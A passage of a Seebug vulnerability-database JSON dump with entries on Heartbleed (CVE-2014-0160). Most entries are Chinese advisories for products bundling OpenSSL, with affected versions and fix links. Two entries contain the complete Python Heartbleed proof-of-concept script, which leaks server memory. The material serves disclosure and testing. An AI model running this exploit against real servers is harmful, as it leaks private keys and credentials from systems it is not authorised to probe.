src=\"https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg\" alt=\"3.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg)", "cvss3": {}, "published": "2014-04-11T00:00:00", "title": "\u4ebf\u90ae\u67d0\u7248\u672cOPENSSL heartbleed \u901a\u6740", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-95013", "id": "SSV:95013", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nLibreOffice\u662f\u4e00\u5957\u53ef\u4e0e\u5176\u4ed6\u4e3b\u8981\u529e\u516c\u5ba4\u8f6f\u4f53\u76f8\u5bb9\u7684\u5957\u4ef6\uff0c\u53ef\u5728\u5404\u79cd\u5e73\u53f0\u4e0a\u6267\u884c\u3002\r\n\r\nLibreOffice\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nLibreOffice 4.x\nLibreOffice 4.2.3\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.libreoffice.org/", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "LibreOffice OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62190", "id": "SSV:62190", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T13:24:13", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "OpenSSL TLS Heartbeat Extension - Memory Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86019", "id": "SSV:86019", "sourceData": "\n #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time() \r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n\r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n\r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86019", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:44", "description": "CVE ID:CVE-2014-0160\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u5bf9\u8c61\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\r\nPostgreSQL\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nPostgreSQL 8.x\r\nPostgreSQL 9.x\nPostgreSQL 9.3.4-3, 9.2.8-3, 9.1.13-3, 9.0.17-3\u548c8.4.21-3\u7248\u672c\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.enterprisedb.com", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "PostgreSQL OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62241", "id": "SSV:62241", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:27:57", "description": "CVE ID:CVE-2014-0160\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nNicira Network Virtualization Platform (NVP) 3.x\r\nVMware ESXi 5.x\r\nVMware NSX 4.x\r\nVMware NSX 6.x\r\nVMware Fusion 6.x\r\nVmware Horizon Mirage 4.x\r\nVMware Horizon View 5.x\r\nVMware Horizon View Client 2.x\r\nVMware Horizon Workspace 1.x\r\nVMware OVF Tool 3.x\r\nVMware vCenter Server 5.x\r\nVMware vCloud Networking and Security (vCNS) 5.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.vmware.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "VMware\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62199", "id": "SSV:62199", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Endpoint Intelligence Agent\u662f\u4e00\u6b3eMcAfee\u4ea7\u54c1\u4e2d\u6240\u4f7f\u7528\u7684\u4e00\u4e2a\u7f51\u7edc\u670d\u52a1\u3002 \r\n\r\nMcAfee Endpoint Intelligence Agent\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent)\nMcAfee Endpoint Intelligence Agent 2.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.mcafee.com", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "McAfee Endpoint Intelligence Agent OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62238", "id": "SSV:62238", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:35:43", "description": "CVE ID:CVE-2014-0160\r\n\r\nIBM XIV Storage System\u662f\u4e00\u6b3e\u7f51\u683c\u5b58\u50a8\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nIBM XIV Storage System\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nIBM XIV Storage System 11.3.0\r\nIBM XIV Storage System 11.3.0.a\r\nIBM XIV Storage System 11.3.1\r\nIBM XIV Storage System 11.4.1\r\nIBM XIV Storage System 11.4.1.a\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u516c\u544a\u83b7\u53d6\u8865\u4e01\u4ee5\u4fee\u590d\u8be5\u6f0f\u6d1e\uff1a\r\nhttp://www.ibm.com/support/docview.wss?uid=ssg1S1004577", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "seebug", "title": "IBM XIV Storage System OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62188", "id": "SSV:62188", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:28:38", "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\n\u7531\u4e8e\u5904\u7406TLS heartbeat\u6269\u5c55\u65f6\u7684\u8fb9\u754c\u9519\u8bef\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u62ab\u9732\u8fde\u63a5\u7684\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5b58\u50a8\u5668\u5185\u5bb9\u3002\r\n0\r\nOpenSSL 1.0.2-beta\r\nOpenSSL 1.0.1\r\nOpenSSL 1.0.1g\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u5347\u7ea7\u4f7f\u7528\uff1a\r\nhttp://www.openssl.org/", "cvss3": {}, "published": "2014-04-08T00:00:00", "title": "OpenSSL TLS Hearbeat\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62086", "id": "SSV:62086", "sourceData": "\n #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time() \r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n\r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n\r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n main()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-62086", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:38", "description": "CVE ID:CVE-2014-0160\r\n\r\nKerio Control\u662f\u4e00\u6b3e\u9632\u706b\u5899\u7cfb\u7edf\u3002\r\n\r\nKerio Control\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nKerio Control 8.x\nKerio Control 8.2.2 patch2\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.kerio.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Kerio Control OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62189", "id": "SSV:62189", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:49", "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenVPN\u662f\u4e00\u6b3e\u5f00\u6e90VPN\u5b9e\u73b0\u3002\r\n\r\nOpenVPN\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nOpenVPN 2.x\nOpenVPN 2.3.3-I002\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://openvpn.net/", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "OpenVPN OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62239", "id": "SSV:62239", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:32", "description": "CVE ID:CVE-2014-0160\r\n\r\nAttachmate Reflection\u662f\u4e00\u6b3e\u4f18\u79c0\u7684Unix\u7ec8\u7aef\u4eff\u771f\u8f6f\u4ef6\u3002\r\n\r\nAttachmate Reflection\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nAttachmate Reflection 14.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.attachmate.com/", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Attachmate Reflection OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62180", "id": "SSV:62180", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:31:20", "description": "CVE ID:CVE-2014-0160\r\n\r\nSAP Sybase SQL Anywhere\u662f\u4e00\u5957\u5168\u9762\u7684\u89e3\u51b3\u65b9\u6848,\u5b83\u63d0\u4f9b\u4e86\u6570\u636e\u7ba1\u7406\u3001\u540c\u6b65\u548c\u6570\u636e\u4ea4\u6362\u6280\u672f,\u53ef\u5feb\u901f\u5728\u8fdc\u7a0b\u548c\u79fb\u52a8\u73af\u5883\u4e2d\u5f00\u53d1\u5e76\u914d\u7f6e\u6570\u636e\u5e93\u9a71\u52a8\u7684\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSAP Sybase SQL Anywhere\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSAP Sybase SQL Anywhere 12.x\r\nSAP Sybase SQL Anywhere 16.x\nSAP Sybase SQL Anywhere 12.01 ebf 4099\u621616.0 ebf 1881\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.sap.com", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "SAP Sybase SQL Anywhere OpenSSL 